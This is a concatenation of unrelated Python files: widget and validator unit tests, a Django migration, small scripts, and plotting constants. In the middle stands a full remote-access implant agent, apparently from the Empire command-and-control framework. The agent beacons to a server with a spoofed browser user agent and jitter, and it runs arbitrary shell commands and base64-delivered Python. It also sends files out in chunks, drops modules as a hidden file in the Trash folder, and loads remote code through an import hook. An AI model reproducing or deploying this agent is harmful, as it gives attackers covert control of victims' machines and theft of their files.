self.assertEqual(sel.margin_left, 10)
self.assertEqual(sel.margin_right, 10)
self.assertEqual(sel.margin_top, 20)
self.assertEqual(sel.margin_bottom, 20)
# Test null border
sel._border_width = 0
sel.draw(surface, w)
def test_none(self) -> None:
"""
Test none selection.
"""
w = Button('epic')
w.set_selection_effect(NoneSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertFalse(w.get_selection_effect().widget_apply_font_color)
# Widgets default selection effect is None
last_selection = w.get_selection_effect()
w.set_selection_effect()
self.assertIsInstance(w.get_selection_effect(), NoneSelection)
self.assertNotEqual(w.get_selection_effect(), last_selection)
def test_simple(self) -> None:
"""
Test simple selection.
"""
w = Button('epic')
w.set_selection_effect(SimpleSelection())
self.menu.add.generic_widget(w)
self.menu.draw(surface)
rect = w.get_rect()
new_rect = w.get_selection_effect().inflate(rect)
self.assertTrue(rect == new_rect)
self.assertTrue(w.get_selection_effect().widget_apply_font_color)
|
n = int(input("Enter a number : "))
s = 0
num =n
while(n>0):
r = n % 10
s = s + r* r* r
n = n//10
if(s==num):
print("The number is Armstrong")
else:
print("The number is not Armstrong")
|
XX XXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
# Generated by Django 3.1.6 on 2021-04-14 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
("websites", "0016_remove_site_content_type_constraint"),
]
operations = [
migrations.RenameField(
model_name="websitecontent",
old_name="hugo_filepath",
new_name="content_filepath",
),
]
|
COLOR = ((1, 0, 0), (0, 1, 0), (1, 0, 1), (1, 1, 0), (0, 162 / 255, 232 / 255), (0.5, 0.5, 0.5), (0, 0, 1), (0, 1, 1),
(136 / 255, 0, 21 / 255), (255 / 255, 127 / 255, 39 / 255), (0, 0, 0))
LINE_STYLE = ['-', '--', ':', '-', '--', ':', '-', '--', ':', '-']
MARKER_STYLE = ['o', 'v', '<', '*', 'D', 'x', '.', 'x', '<', '.']
|
import unittest
from fqfa.validator.create import create_validator
class TestCreateValidator(unittest.TestCase):
def test_create_from_string(self) -> None:
# case sensitive
validator = create_validator("ACGT")
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator("ACGT", case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
def test_create_from_list(self) -> None:
# case sensitive
validator = create_validator(list("ACGT"))
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
# test invalid strings
self.assertIsNone(validator("acgt"))
self.assertIsNone(validator("AAAAAAa"))
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# case insensitive
validator = create_validator(list("ACGT"), case_sensitive=False)
# test valid strings
self.assertIsNotNone(validator("ACGT"))
self.assertIsNotNone(validator("AAAAAAA"))
self.assertIsNotNone(validator("acgt"))
self.assertIsNotNone(validator("AAAAAAa"))
# test invalid strings
self.assertIsNone(validator(""))
self.assertIsNone(validator("123"))
self.assertIsNone(validator("AAAA AAA"))
# invalid list arguments
self.assertRaises(ValueError, create_validator, ["A", "C", "GT"])
self.assertRaises(
ValueError, create_validator, ["A", "C", "GT"], case_sensitive=False
)
self.assertRaises(ValueError, create_validator, ["A", "C", ""])
self.assertRaises(
ValueError, create_validator, ["A", "C", ""], case_sensitive=False
)
if __name__ == "__main__":
unittest.main()
|
from rpip.output import Output
exit0 = {'exit_code': 0, 'stdout': 'yes', 'stderr': ''}
exit1 = {'exit_code': 1, 'stdout': '', 'stderr': 'ERROR'}
o0 = {'host1': exit0, 'host2': exit0, 'host3': exit0}
o1 = {'host1': exit0, 'host2': exit1, 'host3': exit0}
o2 = {'host1': exit0, 'host2': exit1, 'host3': exit1}
def test_groupby():
o = Output(o0)
groups = o.groupby()
assert len(groups) == 1
nodes, output = groups[0]
assert len(nodes) == 3
assert nodes == ['host3', 'host2', 'host1']
assert output == exit0
def test_groupby2():
o = Output(o1)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host1']
assert output == exit0
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host2']
assert output == exit1
def test_groupby3():
o = Output(o2)
groups = o.groupby()
assert len(groups) == 2
nodes, output = groups[0]
assert len(nodes) == 2
assert nodes == ['host3', 'host2']
assert output == exit1
nodes, output = groups[1]
assert len(nodes) == 1
assert nodes == ['host1']
assert output == exit0
|
import json
import struct
import base64
import subprocess
import random
import time
import datetime
import os
import sys
import zlib
import threading
import http.server
import zipfile
import io
import types
import re
import shutil
import pwd
import socket
import math
import stat
import grp
import numbers
from os.path import expanduser
from io import StringIO
from threading import Thread
################################################
#
# agent configuration information
#
################################################
# print "starting agent"
# profile format ->
# tasking uris | user agent | additional header 1 | additional header 2 | ...
profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
if server.endswith("/"): server = server[0:-1]
delay = 60
jitter = 0.0
lostLimit = 60
missedCheckins = 0
jobMessageBuffer = ''
currentListenerName = ""
sendMsgFuncCode = ""
proxy_list = []
# killDate form -> "MO/DAY/YEAR"
killDate = 'REPLACE_KILLDATE'
# workingHours form -> "9:00-17:00"
workingHours = 'REPLACE_WORKINGHOURS'
parts = profile.split('|')
taskURIs = parts[0].split(',')
userAgent = parts[1]
headersRaw = parts[2:]
defaultResponse = base64.b64decode("")
jobs = []
moduleRepo = {}
_meta_cache = {}
# global header dictionary
# sessionID is set by stager.py
# headers = {'User-Agent': userAgent, "Cookie": "SESSIONID=%s" %(sessionID)}
headers = {'User-Agent': userAgent}
# parse the headers into the global header dictionary
for headerRaw in headersRaw:
try:
headerKey = headerRaw.split(":")[0]
headerValue = headerRaw.split(":")[1]
if headerKey.lower() == "cookie":
headers['Cookie'] = "%s;%s" % (headers['Cookie'], headerValue)
else:
headers[headerKey] = headerValue
except:
pass
################################################
#
# communication methods
#
################################################
REPLACE_COMMS
################################################
#
# encryption methods
#
################################################
def decode_routing_packet(data):
"""
Parse ALL routing packets and only process the ones applicable
to this agent.
"""
# returns {sessionID : (language, meta, additional, [encData]), ...}
packets = parse_routing_packet(stagingKey, data)
if packets is None:
return
for agentID, packet in packets.items():
if agentID == sessionID:
(language, meta, additional, encData) = packet
# if meta == 'SERVER_RESPONSE':
process_tasking(encData)
else:
# TODO: how to handle forwarding on other agent routing packets?
pass
def build_response_packet(taskingID, packetData, resultID=0):
"""
Build a task packet for an agent.
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
"""
packetType = struct.pack('=H', taskingID)
totalPacket = struct.pack('=H', 1)
packetNum = struct.pack('=H', 1)
resultID = struct.pack('=H', resultID)
if packetData:
if (isinstance(packetData, str)):
packetData = base64.b64encode(packetData.encode('utf-8', 'ignore'))
else:
packetData = base64.b64encode(packetData.decode('utf-8').encode('utf-8', 'ignore'))
if len(packetData) % 4:
packetData += '=' * (4 - len(packetData) % 4)
length = struct.pack('=L', len(packetData))
return packetType + totalPacket + packetNum + resultID + length + packetData
else:
length = struct.pack('=L', 0)
return packetType + totalPacket + packetNum + resultID + length
def parse_task_packet(packet, offset=0):
"""
Parse a result packet-
[2 bytes] - type
[2 bytes] - total # of packets
[2 bytes] - packet #
[2 bytes] - task/result ID
[4 bytes] - length
[X...] - result data
+------+--------------------+----------+---------+--------+-----------+
| Type | total # of packets | packet # | task ID | Length | task data |
+------+--------------------+--------------------+--------+-----------+
| 2 | 2 | 2 | 2 | 4 | <Length> |
+------+--------------------+----------+---------+--------+-----------+
Returns a tuple with (responseName, length, data, remainingData)
Returns a tuple with (responseName, totalPackets, packetNum, resultID, length, data, remainingData)
"""
try:
packetType = struct.unpack('=H', packet[0 + offset:2 + offset])[0]
totalPacket = struct.unpack('=H', packet[2 + offset:4 + offset])[0]
packetNum = struct.unpack('=H', packet[4 + offset:6 + offset])[0]
resultID = struct.unpack('=H', packet[6 + offset:8 + offset])[0]
length = struct.unpack('=L', packet[8 + offset:12 + offset])[0]
packetData = packet[12 + offset:12 + offset + length].decode('UTF-8')
remainingData = packet[12 + offset + length:].decode('UTF-8')
return (packetType, totalPacket, packetNum, resultID, length, packetData, remainingData)
except Exception as e:
print("parse_task_packet exception:", e)
return (None, None, None, None, None, None, None)
def process_tasking(data):
# processes an encrypted data packet
# -decrypts/verifies the response to get
# -extracts the packets and processes each
try:
# aes_decrypt_and_verify is in stager.py
tasking = aes_decrypt_and_verify(key, data).encode('UTF-8')
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking)
# if we get to this point, we have a legit tasking so reset missedCheckins
missedCheckins = 0
# execute/process the packets and get any response
resultPackets = ""
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset = 12 + length
while remainingData and remainingData != '':
(packetType, totalPacket, packetNum, resultID, length, data, remainingData) = parse_task_packet(tasking,
offset=packetOffset)
result = process_packet(packetType, data, resultID)
if result:
resultPackets += result
packetOffset += 12 + length
# send_message() is patched in from the listener module
send_message(resultPackets)
except Exception as e:
# print "processTasking exception:",e
pass
def process_job_tasking(result):
# process job data packets
# - returns to the C2
# execute/process the packets and get any response
try:
resultPackets = b""
if result:
resultPackets += result
# send packets
send_message(resultPackets)
except Exception as e:
print("processJobTasking exception:", e)
pass
def process_packet(packetType, data, resultID):
try:
packetType = int(packetType)
except Exception as e:
return None
if packetType == 1:
# sysinfo request
# get_sysinfo should be exposed from stager.py
send_message(build_response_packet(1, get_sysinfo(), resultID))
elif packetType == 2:
# agent exit
send_message(build_response_packet(2, "", resultID))
agent_exit()
elif packetType == 34:
proxy_list = json.loads(data)
update_proxychain(proxy_list)
elif packetType == 40:
# run a command
parts = data.split(" ")
if len(parts) == 1:
data = parts[0]
resultData = str(run_command(data))
send_message(build_response_packet(40, resultData, resultID))
else:
cmd = parts[0]
cmdargs = ' '.join(parts[1:len(parts)])
resultData = str(run_command(cmd, cmdargs=cmdargs))
send_message(build_response_packet(40, resultData, resultID))
elif packetType == 41:
# file download
objPath = os.path.abspath(data)
fileList = []
if not os.path.exists(objPath):
send_message(build_response_packet(40, "file does not exist or cannot be accessed", resultID))
if not os.path.isdir(objPath):
fileList.append(objPath)
else:
# recursive dir listing
for folder, subs, files in os.walk(objPath):
for filename in files:
# dont care about symlinks
if os.path.exists(objPath):
fileList.append(objPath + "/" + filename)
for filePath in fileList:
offset = 0
size = os.path.getsize(filePath)
partIndex = 0
while True:
# get 512kb of the given file starting at the specified offset
encodedPart = get_file_part(filePath, offset=offset, base64=False)
c = compress()
start_crc32 = c.crc32_data(encodedPart)
comp_data = c.comp_data(encodedPart)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
partData = "%s|%s|%s|%s" % (partIndex, filePath, size, encodedPart)
if not encodedPart or encodedPart == '' or len(encodedPart) == 16:
break
send_message(build_response_packet(41, partData, resultID))
global delay
global jitter
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
partIndex += 1
offset += 512000
elif packetType == 42:
# file upload
try:
parts = data.split("|")
filePath = parts[0]
base64part = parts[1]
raw = base64.b64decode(base64part)
with open(filePath, 'ab') as f:
f.write(raw)
send_message(build_response_packet(42, "[*] Upload of %s successful" % (filePath), resultID))
except Exception as e:
send_message(build_response_packet(0, "[!] Error in writing file %s during upload: %s" % (filePath, str(e)), resultID))
elif packetType == 43:
# directory list
cmdargs = data
path = '/' # default to root
if cmdargs is not None and cmdargs != '' and cmdargs != '/': # strip trailing slash for uniformity
path = cmdargs.rstrip('/')
if path[0] != '/': # always scan relative to root for uniformity
path = '/{0}'.format(path)
if not os.path.isdir(path):
send_message(build_response_packet(43, 'Directory {} not found.'.format(path), resultID))
items = []
with os.scandir(path) as it:
for entry in it:
items.append({'path': entry.path, 'name': entry.name, 'is_file': entry.is_file()})
result_data = json.dumps({
'directory_name': path if len(path) == 1 else path.split('/')[-1],
'directory_path': path,
'items': items
})
send_message(build_response_packet(43, result_data, resultID))
elif packetType == 50:
# return the currently running jobs
msg = ""
if len(jobs) == 0:
msg = "No active jobs"
else:
msg = "Active jobs:\n"
for x in range(len(jobs)):
msg += "\t%s" % (x)
send_message(build_response_packet(50, msg, resultID))
elif packetType == 51:
# stop and remove a specified job if it's running
try:
# Calling join first seems to hang
# result = jobs[int(data)].join()
send_message(build_response_packet(0, "[*] Attempting to stop job thread", resultID))
result = jobs[int(data)].kill()
send_message(build_response_packet(0, "[*] Job thread stoped!", resultID))
jobs[int(data)]._Thread__stop()
jobs.pop(int(data))
if result and result != "":
send_message(build_response_packet(51, result, resultID))
except:
return build_response_packet(0, "error stopping job: %s" % (data), resultID)
elif packetType == 100:
# dynamic code execution, wait for output, don't save outputPicl
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue()
send_message(build_response_packet(100, str(results), resultID))
except Exception as e:
errorData = str(buffer.getvalue())
return build_response_packet(0, "error executing specified Python data: %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID)
elif packetType == 101:
# dynamic code execution, wait for output, save output
prefix = data[0:15].strip()
extension = data[15:20].strip()
data = data[20:]
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(data, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
results = buffer.getvalue().encode('latin-1')
c = compress()
start_crc32 = c.crc32_data(results)
comp_data = c.comp_data(results)
encodedPart = c.build_header(comp_data, start_crc32)
encodedPart = base64.b64encode(encodedPart).decode('UTF-8')
send_message(
build_response_packet(101, '{0: <15}'.format(prefix) + '{0: <5}'.format(extension) + encodedPart,
resultID))
except Exception as e:
# Also return partial code that has been executed
errorData = buffer.getvalue()
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 102:
# on disk code execution for modules that require multiprocessing not supported by exec
try:
implantHome = expanduser("~") + '/.Trash/'
moduleName = ".mac-debug-data"
implantPath = implantHome + moduleName
result = "[*] Module disk path: %s \n" % (implantPath)
with open(implantPath, 'w') as f:
f.write(data)
result += "[*] Module properly dropped to disk \n"
pythonCommand = "python %s" % (implantPath)
process = subprocess.Popen(pythonCommand, stdout=subprocess.PIPE, shell=True)
data = process.communicate()
result += data[0].strip()
try:
os.remove(implantPath)
result += "[*] Module path was properly removed: %s" % (implantPath)
except Exception as e:
print("error removing module filed: %s" % (e))
fileCheck = os.path.isfile(implantPath)
if fileCheck:
result += "\n\nError removing module file, please verify path: " + str(implantPath)
send_message(build_response_packet(100, str(result), resultID))
except Exception as e:
fileCheck = os.path.isfile(implantPath)
if fileCheck:
send_message(build_response_packet(0,
"error executing specified Python data: %s \nError removing module file, please verify path: %s" % (
e, implantPath), resultID))
send_message(build_response_packet(0, "error executing specified Python data: %s" % (e), resultID))
elif packetType == 110:
start_job(data, resultID)
elif packetType == 111:
# TASK_CMD_JOB_SAVE
# TODO: implement job structure
pass
elif packetType == 121:
# base64 decode the script and execute
script = base64.b64decode(data)
try:
buffer = StringIO()
sys.stdout = buffer
code_obj = compile(script, '<string>', 'exec')
exec(code_obj, globals())
sys.stdout = sys.__stdout__
result = str(buffer.getvalue())
send_message(build_response_packet(121, result, resultID))
except Exception as e:
errorData = str(buffer.getvalue())
send_message(build_response_packet(0,
"error executing specified Python data %s \nBuffer data recovered:\n%s" % (
e, errorData), resultID))
elif packetType == 122:
# base64 decode and decompress the data
try:
parts = data.split('|')
base64part = parts[1]
fileName = parts[0]
raw = base64.b64decode(base64part)
d = decompress()
dec_data = d.dec_data(raw, cheader=True)
if not dec_data['crc32_check']:
send_message(build_response_packet(122, "Failed crc32_check during decompression", resultID))
except Exception as e:
send_message(build_response_packet(122, "Unable to decompress zip file: %s" % (e), resultID))
zdata = dec_data['data']
zf = zipfile.ZipFile(io.BytesIO(zdata), "r")
if fileName in list(moduleRepo.keys()):
send_message(build_response_packet(122, "%s module already exists" % (fileName), resultID))
else:
moduleRepo[fileName] = zf
install_hook(fileName)
send_message(build_response_packet(122, "Successfully imported %s" % (fileName), resultID))
elif packetType == 123:
# view loaded modules
repoName = data
if repoName == "":
loadedModules = "\nAll Repos\n"
for key, value in list(moduleRepo.items()):
loadedModules += "\n----" + key + "----\n"
loadedModules += '\n'.join(moduleRepo[key].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
else:
try:
loadedModules = "\n----" + repoName + "----\n"
loadedModules += '\n'.join(moduleRepo[repoName].namelist())
send_message(build_response_packet(123, loadedModules, resultID))
except Exception as e:
msg = "Unable to retrieve repo contents: %s" % (str(e))
send_message(build_response_packet(123, msg, resultID))
elif packetType == 124:
# remove module
repoName = data
try:
remove_hook(repoName)
del moduleRepo[repoName]
send_message(build_response_packet(124, "Successfully remove repo: %s" % (repoName), resultID))
except Exception as e:
send_message(build_response_packet(124, "Unable to remove repo: %s, %s" % (repoName, str(e)), resultID))
else:
send_message(build_response_packet(0, "invalid tasking ID: %s" % (taskingID), resultID))
def old_div(a, b):
"""
Equivalent to ``a / b`` on Python 2 without ``from __future__ import
division``.
"""
if isinstance(a, numbers.Integral) and isinstance(b, numbers.Integral):
return a // b
else:
return a / b
################################################
#
# Custom Import Hook
# #adapted from https://github.com/sulinx/remote_importer
#
################################################
# [0] = .py ext, is_package = False
# [1] = /__init__.py ext, is_package = True
_search_order = [('.py', False), ('/__init__.py', True)]
class ZipImportError(ImportError):
"""Exception raised by zipimporter objects."""
# _get_info() = takes the fullname, then subpackage name (if applicable),
# and searches for the respective module or package
class CFinder(object):
"""Import Hook for Empire"""
def __init__(self, repoName):
self.repoName = repoName
def _get_info(self, repoName, fullname):
"""Search for the respective package or module in the zipfile object"""
parts = fullname.split('.')
submodule = parts[-1]
modulepath = '/'.join(parts)
# check to see if that specific module exists
for suffix, is_package in _search_order:
relpath = modulepath + suffix
try:
moduleRepo[repoName].getinfo(relpath)
except KeyError:
pass
else:
return submodule, is_package, relpath
# Error out if we can find the module/package
msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
raise ZipImportError(msg)
def _get_source(self, repoName, fullname):
"""Get the source code for the requested module"""
submodule, is_package, relpath = self._get_info(repoName, fullname)
fullpath = '%s/%s' % (repoName, relpath)
source = moduleRepo[repoName].read(relpath)
source = source.replace('\r\n', '\n')
source = source.replace('\r', '\n')
return submodule, is_package, fullpath, source
def find_module(self, fullname, path=None):
try:
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
except ImportError:
return None
else:
return self
def load_module(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
code = compile(source, fullpath, 'exec')
mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
mod.__loader__ = self
mod.__file__ = fullpath
mod.__name__ = fullname
if is_package:
mod.__path__ = [os.path.dirname(mod.__file__)]
exec(code, mod.__dict__)
return mod
def get_data(self, fullpath):
prefix = os.path.join(self.repoName, '')
if not fullpath.startswith(prefix):
raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
relpath = fullpath[len(prefix):]
try:
return moduleRepo[self.repoName].read(relpath)
except KeyError:
raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
def is_package(self, fullname):
"""Return if the module is a package"""
submodule, is_package, relpath = self._get_info(self.repoName, fullname)
return is_package
def get_code(self, fullname):
submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
return compile(source, fullpath, 'exec')
def install_hook(repoName):
if repoName not in _meta_cache:
finder = CFinder(repoName)
_meta_cache[repoName] = finder
sys.meta_path.append(finder)
def remove_hook(repoName):
if repoName in _meta_cache:
finder = _meta_cache.pop(repoName)
sys.meta_path.remove(finder)
################################################
#
# misc methods
#
################################################
class compress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def comp_data(self, data, cvalue=COMP_RATIO):
'''
Takes in a string and computes
the comp obj.
data = string wanting compression
cvalue = 0-9 comp value (default 6)
'''
cdata = zlib.compress(data, cvalue)
return cdata
def crc32_data(self, data):
'''
Takes in a string and computes crc32 value.
data = string before compression
returns:
HEX bytes of data
'''
crc = zlib.crc32(data) & 0xFFFFFFFF
return crc
def build_header(self, data, crc):
'''
Takes comp data, org crc32 value,
and adds self header.
data = comp data
crc = crc32 value
'''
header = struct.pack("!I", crc)
built_data = header + data
return built_data
class decompress(object):
'''
Base clase for init of the package. This will handle
the initial object creation for conducting basic functions.
'''
CRC_HSIZE = 4
COMP_RATIO = 9
def __init__(self, verbose=False):
"""
Populates init.
"""
pass
def dec_data(self, data, cheader=True):
'''
Takes:
Custom / standard header data
data = comp data with zlib header
BOOL cheader = passing custom crc32 header
returns:
dict with crc32 cheack and dec data string
ex. {"crc32" : true, "dec_data" : "-SNIP-"}
'''
if cheader:
comp_crc32 = struct.unpack("!I", data[:self.CRC_HSIZE])[0]
dec_data = zlib.decompress(data[self.CRC_HSIZE:])
dec_crc32 = zlib.crc32(dec_data) & 0xFFFFFFFF
if comp_crc32 == dec_crc32:
crc32 = True
else:
crc32 = False
return {"header_crc32": comp_crc32, "dec_crc32": dec_crc32, "crc32_check": crc32, "data": dec_data}
else:
dec_data = zlib.decompress(data)
return dec_data
def agent_exit():
# exit for proper job / thread cleanup
if len(jobs) > 0:
try:
for x in jobs:
jobs[int(x)].kill()
jobs.pop(x)
except:
# die hard if thread kill fails
pass
exit()
def indent(lines, amount=4, ch=' '):
padding = amount * ch
return padding + ('\n' + padding).join(lines.split('\n'))
# from http://stackoverflow.com/questions/6893968/how-to-get-the-return-value-from-a-thread-in-python
class ThreadWithReturnValue(Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs={}, Verbose=None):
Thread.__init__(self, group, target, name, args, kwargs, Verbose)
self._return = None
def run(self):
if self._Thread__target is not None:
self._return = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
def join(self):
Thread.join(self)
return self._return
class KThread(threading.Thread):
"""A subclass of threading.Thread, with a kill()
method."""
def __init__(self, *args, **keywords):
threading.Thread.__init__(self, *args, **keywords)
self.killed = False
def start(self):
"""Start the thread."""
self.__run_backup = self.run
self.run = self.__run # Force the Thread toinstall our trace.
threading.Thread.start(self)
def __run(self):
"""Hacked run function, which installs the
trace."""
sys.settrace(self.globaltrace)
self.__run_backup()
self.run = self.__run_backup
def globaltrace(self, frame, why, arg):
if why == 'call':
return self.localtrace
else:
return None
def localtrace(self, frame, why, arg):
if self.killed:
if why == 'line':
raise SystemExit()
return self.localtrace
def kill(self):
self.killed = True
def start_job(code, resultID):
global jobs
# create a new code block with a defined method name
codeBlock = "def method():\n" + indent(code[1:])
# register the code block
code_obj = compile(codeBlock, '<string>', 'exec')
# code needs to be in the global listing
# not the locals() scope
exec(code_obj, globals())
# create/process Packet start/return the thread
# call the job_func so sys data can be captured
codeThread = KThread(target=job_func, args=(resultID,))
codeThread.start()
jobs.append(codeThread)
def job_func(resultID):
try:
buffer = StringIO()
sys.stdout = buffer
# now call the function required
# and capture the output via sys
method()
sys.stdout = sys.__stdout__
dataStats_2 = buffer.getvalue()
result = build_response_packet(110, str(dataStats_2), resultID)
process_job_tasking(result)
except Exception as e:
p = "error executing specified Python job data: " + str(e)
result = build_response_packet(0, p, resultID)
process_job_tasking(result)
def job_message_buffer(message):
# Supports job messages for checkin
global jobMessageBuffer
try:
jobMessageBuffer += str(message)
except Exception as e:
print(e)
def get_job_message_buffer():
global jobMessageBuffer
try:
result = build_response_packet(110, str(jobMessageBuffer))
jobMessageBuffer = ""
return result
except Exception as e:
return build_response_packet(0, "[!] Error getting job output: %s" % (e))
def send_job_message_buffer():
if len(jobs) > 0:
result = get_job_message_buffer()
process_job_tasking(result)
else:
pass
def start_webserver(data, ip, port, serveCount):
# thread data_webserver for execution
t = threading.Thread(target=data_webserver, args=(data, ip, port, serveCount))
t.start()
return
def data_webserver(data, ip, port, serveCount):
# hosts a file on port and IP servers data string
hostName = str(ip)
portNumber = int(port)
data = str(data)
serveCount = int(serveCount)
count = 0
class serverHandler(http.server.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(data)
def log_message(s, format, *args):
return
server_class = http.server.HTTPServer
httpServer = server_class((hostName, portNumber), serverHandler)
try:
while (count < serveCount):
httpServer.handle_request()
count += 1
except:
pass
httpServer.server_close()
return
def permissions_to_unix_name(st_mode):
permstr = ''
usertypes = ['USR', 'GRP', 'OTH']
for usertype in usertypes:
perm_types = ['R', 'W', 'X']
for permtype in perm_types:
perm = getattr(stat, 'S_I%s%s' % (permtype, usertype))
if st_mode & perm:
permstr += permtype.lower()
else:
permstr += '-'
return permstr
def directory_listing(path):
# directory listings in python
# https://www.opentechguides.com/how-to/article/python/78/directory-file-list.html
res = ""
for fn in os.listdir(path):
fstat = os.stat(os.path.join(path, fn))
permstr = permissions_to_unix_name(fstat[0])
if os.path.isdir(fn):
permstr = "d{}".format(permstr)
else:
permstr = "-{}".format(permstr)
user = pwd.getpwuid(fstat.st_uid)[0]
group = grp.getgrgid(fstat.st_gid)[0]
# Convert file size to MB, KB or Bytes
if (fstat.st_size > 1024 * 1024):
fsize = math.ceil(old_div(fstat.st_size, (1024 * 1024)))
unit = "MB"
elif (fstat.st_size > 1024):
fsize = math.ceil(old_div(fstat.st_size, 1024))
unit = "KB"
else:
fsize = fstat.st_size
unit = "B"
mtime = time.strftime("%X %x", time.gmtime(fstat.st_mtime))
res += '{} {} {} {:18s} {:f} {:2s} {:15.15s}\n'.format(permstr, user, group, mtime, fsize, unit, fn)
return res
# additional implementation methods
def run_command(command, cmdargs=None):
if re.compile("(ls|dir)").match(command):
if cmdargs == None or not os.path.exists(cmdargs):
cmdargs = '.'
return directory_listing(cmdargs)
if re.compile("cd").match(command):
os.chdir(cmdargs)
return str(os.getcwd())
elif re.compile("pwd").match(command):
return str(os.getcwd())
elif re.compile("rm").match(command):
if cmdargs == None:
return "please provide a file or directory"
if os.path.exists(cmdargs):
if os.path.isfile(cmdargs):
os.remove(cmdargs)
return "done."
elif os.path.isdir(cmdargs):
shutil.rmtree(cmdargs)
return "done."
else:
return "unsupported file type"
else:
return "specified file/directory does not exist"
elif re.compile("mkdir").match(command):
if cmdargs == None:
return "please provide a directory"
os.mkdir(cmdargs)
return "Created directory: {}".format(cmdargs)
elif re.compile("(whoami|getuid)").match(command):
return pwd.getpwuid(os.getuid())[0]
elif re.compile("hostname").match(command):
return str(socket.gethostname())
else:
if cmdargs != None:
command = "{} {}".format(command, cmdargs)
p = subprocess.Popen(command, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
return p.communicate()[0].strip().decode('UTF-8')
def get_file_part(filePath, offset=0, chunkSize=512000, base64=True):
if not os.path.exists(filePath):
return ''
f = open(filePath, 'rb')
f.seek(offset, 0)
data = f.read(chunkSize)
f.close()
if base64:
return base64.b64encode(data)
else:
return data
################################################
#
# main agent functionality
#
################################################
while (True):
try:
if workingHours != '' and 'WORKINGHOURS' not in workingHours:
try:
start, end = workingHours.split('-')
now = datetime.datetime.now()
startTime = datetime.datetime.strptime(start, "%H:%M")
endTime = datetime.datetime.strptime(end, "%H:%M")
if not (startTime <= now <= endTime):
sleepTime = startTime - now
# sleep until the start of the next window
time.sleep(sleepTime.seconds)
except Exception as e:
pass
# check if we're past the killdate for this agent
# killDate form -> MO/DAY/YEAR
if killDate != "" and 'KILLDATE' not in killDate:
now = datetime.datetime.now().date()
try:
killDateTime = datetime.datetime.strptime(killDate, "%m/%d/%Y").date()
except:
pass
if now >= killDateTime:
msg = "[!] Agent %s exiting" % (sessionID)
send_message(build_response_packet(2, msg))
agent_exit()
# exit if we miss commnicating with the server enough times
if missedCheckins >= lostLimit:
agent_exit()
# sleep for the randomized interval
if jitter < 0: jitter = -jitter
if jitter > 1: jitter = old_div(1, jitter)
minSleep = int((1.0 - jitter) * delay)
maxSleep = int((1.0 + jitter) * delay)
sleepTime = random.randint(minSleep, maxSleep)
time.sleep(sleepTime)
(code, data) = send_message()
if code == '200':
try:
send_job_message_buffer()
except Exception as e:
result = build_response_packet(0, str('[!] Failed to check job buffer!: ' + str(e)))
process_job_tasking(result)
if data.strip() == defaultResponse.strip():
missedCheckins = 0
else:
decode_routing_packet(data)
else:
pass
# print "invalid code:",code
except Exception as e:
print("main() exception: %s" % (e))
|
# -*- coding: utf-8 -*-
"""
AMPLPY
------
AMPL API is an interface that allows developers to access the features of the
AMPL interpreter from within a programming language. All model generation and
